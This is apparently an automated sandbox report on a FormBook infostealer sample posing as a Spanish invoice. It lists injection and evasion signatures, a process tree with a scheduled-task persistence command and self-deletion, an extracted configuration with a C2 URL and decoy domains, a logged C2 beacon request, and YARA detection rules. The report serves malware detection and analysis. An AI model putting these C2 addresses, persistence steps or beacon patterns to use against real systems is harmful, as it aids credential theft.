Loading ...

Play interactive tourEdit tour

Windows Analysis Report Factura de proforma.exe

Overview

General Information

Sample Name:Factura de proforma.exe
Analysis ID:502357
MD5:16f7045eebb451234ca8078222c5994c
SHA1:99e8f263f9e34ad13cb8cd6af1bb816deffb5bde
SHA256:ff344e635b268090aafdb8fa830e76c41f34d7cf9a9bf03ed4ede2705008bfef
Tags:ESPexegeo
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Factura de proforma.exe (PID: 6952 cmdline: 'C:\Users\user\Desktop\Factura de proforma.exe' MD5: 16F7045EEBB451234CA8078222C5994C)
    • schtasks.exe (PID: 6436 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 6388 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 4716 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 3408 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.thefanlounge.com/cb3b/"], "decoy": ["listenlocker.com", "jumpstartnotarybiz.com", "new-post-vehicle-site.xyz", "summon-entertainment.com", "johnandtracy-adopt.com", "bferety.info", "palmonlae.space", "yx1889.com", "janetnaufranck.com", "banditanalytics.com", "agenciahologram.com", "artemojo.com", "goldensuninn.com", "aminobalm.com", "customersme.com", "techcareerschool.com", "angelahuckeby.com", "smoothcontract.com", "kartsorgumerkezi.com", "houstonhemorrhoidclinic.com", "istanbuloz.com", "buyrealestatewithcarlos.com", "onlinelivehds.xyz", "outstandingearth.com", "cyclingsunglassestop.com", "haras-dors.com", "zhuanyekf.com", "pps-squad.com", "highlovely.com", "hudsonvalleymomandpopshop.com", "graytielaw.com", "orang-gilakali.com", "sajaasboutique.com", "nwomakrom.com", "mobilne-kucice.com", "instant-geek.com", "brewinginthenameof.com", "shopstel.net", "alumaber.com", "fernoost.info", "expandablepocketdeals.com", "ritelard.net", "elderyochanan.com", "gofante.online", "americansforbrazil.com", "condosofcolor.com", "the2gaku.com", "mesegeka.com", "democratsforesteban.com", "vinoporfavor.com", "xwaxxc1.com", "jinhongtextile.com", "festival-du-chanvre.com", "abrasivburada.com", "pinhoti.net", "nestd.online", "fendlercart.com", "unanox.com", "boyscout-site.com", "wlctrade.com", "gudesigns.net", "jandmisia.com", "funnyp0sts.com", "laveudelamare.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x992a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 21 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.RegSvcs.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Factura de proforma.exe.2bd16b0.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          0.2.Factura de proforma.exe.3cc0560.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 8 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
            Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\Factura de proforma.exe' , ParentImage: C:\Users\user\Desktop\Factura de proforma.exe, ParentProcessId: 6952, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6388
            Sigma detected: Possible Applocker BypassShow sources
            Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\Factura de proforma.exe' , ParentImage: C:\Users\user\Desktop\Factura de proforma.exe, ParentProcessId: 6952, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6388

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.thefanlounge.com/cb3b/"], "decoy": ["listenlocker.com", "jumpstartnotarybiz.com", "new-post-vehicle-site.xyz", "summon-entertainment.com", "johnandtracy-adopt.com", "bferety.info", "palmonlae.space", "yx1889.com", "janetnaufranck.com", "banditanalytics.com", "agenciahologram.com", "artemojo.com", "goldensuninn.com", "aminobalm.com", "customersme.com", "techcareerschool.com", "angelahuckeby.com", "smoothcontract.com", "kartsorgumerkezi.com", "houstonhemorrhoidclinic.com", "istanbuloz.com", "buyrealestatewithcarlos.com", "onlinelivehds.xyz", "outstandingearth.com", "cyclingsunglassestop.com", "haras-dors.com", "zhuanyekf.com", "pps-squad.com", "highlovely.com", "hudsonvalleymomandpopshop.com", "graytielaw.com", "orang-gilakali.com", "sajaasboutique.com", "nwomakrom.com", "mobilne-kucice.com", "instant-geek.com", "brewinginthenameof.com", "shopstel.net", "alumaber.com", "fernoost.info", "expandablepocketdeals.com", "ritelard.net", "elderyochanan.com", "gofante.online", "americansforbrazil.com", "condosofcolor.com", "the2gaku.com", "mesegeka.com", "democratsforesteban.com", "vinoporfavor.com", "xwaxxc1.com", "jinhongtextile.com", "festival-du-chanvre.com", "abrasivburada.com", "pinhoti.net", "nestd.online", "fendlercart.com", "unanox.com", "boyscout-site.com", "wlctrade.com", "gudesigns.net", "jandmisia.com", "funnyp0sts.com", "laveudelamare.com"]}
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORY
            Source: 6.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: Factura de proforma.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Factura de proforma.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: RegSvcs.exe, 00000006.00000002.406155784.00000000036A0000.00000040.00020000.sdmp
            Source: Binary string: RegSvcs.pdb, source: cscript.exe, 0000000A.00000002.573045416.0000000004CEF000.00000004.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, cscript.exe
            Source: Binary string: RegSvcs.pdb source: cscript.exe, 0000000A.00000002.573045416.0000000004CEF000.00000004.00020000.sdmp
            Source: Binary string: cscript.pdb source: RegSvcs.exe, 00000006.00000002.406155784.00000000036A0000.00000040.00020000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.aminobalm.com
            Source: C:\Windows\explorer.exeDomain query: www.palmonlae.space
            Source: C:\Windows\explorer.exeNetwork Connect: 13.209.99.177 80
            Performs DNS queries to domains with low reputationShow sources
            Source: DNS query: www.new-post-vehicle-site.xyz
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.thefanlounge.com/cb3b/
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: global trafficHTTP traffic detected: GET /cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h HTTP/1.1Host: www.aminobalm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Factura de proforma.exe, 00000000.00000003.299841120.0000000000D0D000.00000004.00000001.sdmpString found in binary or memory: http://en.w
            Source: Factura de proforma.exe, 00000000.00000003.301130424.0000000005AEB000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: Factura de proforma.exe, 00000000.00000003.307837879.0000000005ADD000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Factura de proforma.exe, 00000000.00000003.307837879.0000000005ADD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerskSHU
            Source: Factura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: Factura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com-uT
            Source: Factura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comc
            Source: Factura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comn
            Source: Factura de proforma.exe, 00000000.00000003.304081072.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Factura de proforma.exe, 00000000.00000003.304064871.0000000005B0D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn.U
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Factura de proforma.exe, 00000000.00000003.304064871.0000000005B0D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn2U%
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/7D
            Source: Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/JD
            Source: Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/XDiUa
            Source: Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/a-eoDFU$
            Source: Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ko
            Source: Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t
            Source: Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/tDMU
            Source: Factura de proforma.exe, 00000000.00000003.300417307.0000000005AEB000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000003.303541923.0000000005AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: Factura de proforma.exe, 00000000.00000003.303541923.0000000005AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krN.TTFs
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: Factura de proforma.exe, 00000000.00000003.301130424.0000000005AEB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comF
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: cscript.exe, 0000000A.00000002.573092724.00000000051DF000.00000004.00020000.sdmpString found in binary or memory: https://www.dotname.co.kr/customer/event/2019/20190604_landing_dotname?c6=kr386M7znJup/B2j4KhdpwCgkx
            Source: unknownDNS traffic detected: queries for: www.palmonlae.space
            Source: global trafficHTTP traffic detected: GET /cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h HTTP/1.1Host: www.aminobalm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Factura de proforma.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
